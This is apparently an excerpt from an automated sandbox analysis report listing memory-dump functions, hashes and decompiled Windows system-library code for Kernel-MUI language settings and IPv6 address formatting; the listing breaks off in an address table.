Uniqueness

Uniqueness Score: -1.00%

Function 009FFB50, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447

Uniqueness

Uniqueness Score: -1.00%

Function 009FFC30, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 009FFC48, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456

Uniqueness

Uniqueness Score: -1.00%

Function 00A00C40, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547

Uniqueness

Uniqueness Score: -1.00%

Function 00A01D80, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686

Uniqueness

Uniqueness Score: -1.00%

Function 009FFD5C, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 009FFE24, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456

Uniqueness

Uniqueness Score: -1.00%

Function 009FFFFC, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B

Uniqueness

Uniqueness Score: -1.00%

Function 009FFF34, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A

Uniqueness

Uniqueness Score: -1.00%

Function 00A28788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00A28788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00A28460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E00A0E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E00A2718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00A28460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E00A2718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00A28460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00A28460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00A28460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E00A2718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E00A0E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00A02340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E00A1E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E00A0E2A8(_t322,  &_v68, _v16);
								if(E00A25553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E00A1E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E00A0E2A8(_t322,  &_v68, _t236);
								if(E00A25553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E00A2718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E00A0E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00A02340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E00A1E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E00A0E2A8(_v12,  &_v68, _v16);
							if(E00A25553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E00A1E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E00A0E2A8(_t322,  &_v68, _t269);
							if(E00A25553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E00A2718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E00A0E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00A02340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E00A1E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E00A0E2A8(_v12,  &_v68, _v16);
						if(E00A25553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E00A1E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E00A0E2A8(_t322,  &_v68, _t296);
						if(E00A25553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}

0x00a28788
0x00a28788
0x00a28791
0x00a28794
0x00a28798
0x00a2879b
0x00a2879e
0x00a287a1
0x00a287a4
0x00a287a7
0x00a287aa
0x00a287af
0x00a71ad3
0x00a28b0a
0x00a28b0d
0x00a28b13
0x00a28b19
0x00a28b1f
0x00a28b25
0x00a28b2b
0x00a28b31
0x00a28b37
0x00a28b3d
0x00a28b46
0x00a28b46
0x00a287c6
0x00a287d0
0x00a71ae0
0x00a71ae6
0x00a71af8
0x00a71af8
0x00a71afd
0x00a71afe
0x00a71b01
0x00a71b06
0x00a71b06
0x00a287d6
0x00a287f2
0x00a287f7
0x00a28807
0x00a2880a
0x00a2880f
0x00a28810
0x00a28813
0x00a28818
0x00a28818
0x00a2882c
0x00a28831
0x00a28838
0x00a28908
0x00a28920
0x00a289f0
0x00a28a08
0x00a28af6
0x00a28af6
0x00a28af8
0x00a28afb
0x00a71beb
0x00a71beb
0x00a28b04
0x00a71bf8
0x00a71c0e
0x00a71c13
0x00a71c16
0x00a71c16
0x00a71bf8
0x00000000
0x00a28b04
0x00a28a0e
0x00a28a11
0x00a28a14
0x00a28a15
0x00a28a18
0x00a28a22
0x00a28b59
0x00a28a28
0x00a28a3c
0x00a28a3c
0x00a28a42
0x00a71bb0
0x00a71b11
0x00a71b11
0x00000000
0x00a28a48
0x00a28a51
0x00a28a5b
0x00a28a5e
0x00a28a61
0x00a28a69
0x00a28a69
0x00a28a6d
0x00000000
0x00000000
0x00a28a74
0x00a28a7c
0x00a28a7d
0x00a28a91
0x00a28a93
0x00a28a93
0x00a28a98
0x00a28a9b
0x00a28aa1
0x00a28aa1
0x00a28aa4
0x00a28aaa
0x00a28ab1
0x00a28ac5
0x00a28ac7
0x00a28ac7
0x00a28ac5
0x00a28ace
0x00a71bc9
0x00a71bce
0x00a71bd2
0x00a71bd2
0x00a28ad8
0x00a28aeb
0x00a28aeb
0x00a28af0
0x00a28af4
0x00000000
0x00a28af4
0x00a28a42
0x00a28926
0x00a28929
0x00a2892c
0x00a2892d
0x00a28930
0x00a28935
0x00a2893a
0x00a28b51
0x00a28940
0x00a28954
0x00a28954
0x00a2895a
0x00a71b63
0x00000000
0x00a28960
0x00a28969
0x00a28973
0x00a28976
0x00a28979
0x00a2897e
0x00a28981
0x00a28981
0x00a28986
0x00000000
0x00000000
0x00a71b6e
0x00a71b74
0x00a71b7b
0x00a71b8f
0x00a71b91
0x00a71b91
0x00a71b99
0x00a71b9c
0x00a71ba2
0x00a71ba2
0x00a2898c
0x00a28992
0x00a28999
0x00a289ad
0x00a71ba8
0x00a71ba8
0x00a289ad
0x00a289b6
0x00a289c8
0x00a289cd
0x00a289d0
0x00a289d0
0x00a289d6
0x00a289e8
0x00a289e8
0x00a289ed
0x00000000
0x00a289ed
0x00a2895a
0x00a2883e
0x00a28841
0x00a28844
0x00a28845
0x00a28848
0x00a2884d
0x00a28852
0x00a28b49
0x00a28858
0x00a2886c
0x00a2886c
0x00a28872
0x00a71b0e
0x00000000
0x00a28878
0x00a28881
0x00a2888b
0x00a2888e
0x00a28891
0x00a28896
0x00a28899
0x00a28899
0x00a2889e
0x00000000
0x00000000
0x00a71b21
0x00a71b27
0x00a71b2e
0x00a71b42
0x00a71b44
0x00a71b44
0x00a71b4c
0x00a71b4f
0x00a71b55
0x00a71b55
0x00a288a4
0x00a288aa
0x00a288b1
0x00a288c5
0x00a71b5b
0x00a71b5b
0x00a288c5
0x00a288ce
0x00a288e0
0x00a288e5
0x00a288e8
0x00a288e8
0x00a288ee
0x00a28900
0x00a28900
0x00a28905
0x00000000
0x00a28905

APIs

_wcspbrk.LIBCMT ref: 00A28891
_wcspbrk.LIBCMT ref: 00A28979
_wcspbrk.LIBCMT ref: 00A28A61
_wcspbrk.LIBCMT ref: 00A28A9B
_wcspbrk.LIBCMT ref: 00A71B9C

Strings

WindowsExcludedProcs, xrefs: 00A287C1
Kernel-MUI-Language-Allowed, xrefs: 00A28827
Kernel-MUI-Language-SKU, xrefs: 00A289FC
Kernel-MUI-Language-Disallowed, xrefs: 00A28914
Kernel-MUI-Number-Allowed, xrefs: 00A287E6

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcspbrk
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 402402107-258546922
Opcode ID: c9c9ec179aad099c43d39130170d434657862eb9623271d1cc944fe714be48b1
Instruction ID: 503236c3e890c062753b3303cdb6cdf9fdf712f62648cd8bfc69079971de652b
Opcode Fuzzy Hash: c9c9ec179aad099c43d39130170d434657862eb9623271d1cc944fe714be48b1
Instruction Fuzzy Hash: 5BF1F7B2D00219EFCF11EF98DA819EEB7B8FF08300F14846AF505A7251EB359A45DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A413CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E00A413CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00A37707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0xa02926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00A37707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0xa09cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00A37707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00A37707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00A37707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00A37707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}

0x00a413d5
0x00a413d9
0x00a413dc
0x00a413de
0x00a413e1
0x00a413e8
0x00a413ee
0x00a6e8fd
0x00000000
0x00a6e921
0x00a6e921
0x00a6e928
0x00a6e982
0x00a6e98a
0x00000000
0x00a6e99a
0x00a6e99e
0x00a6e9a3
0x00a6e9a8
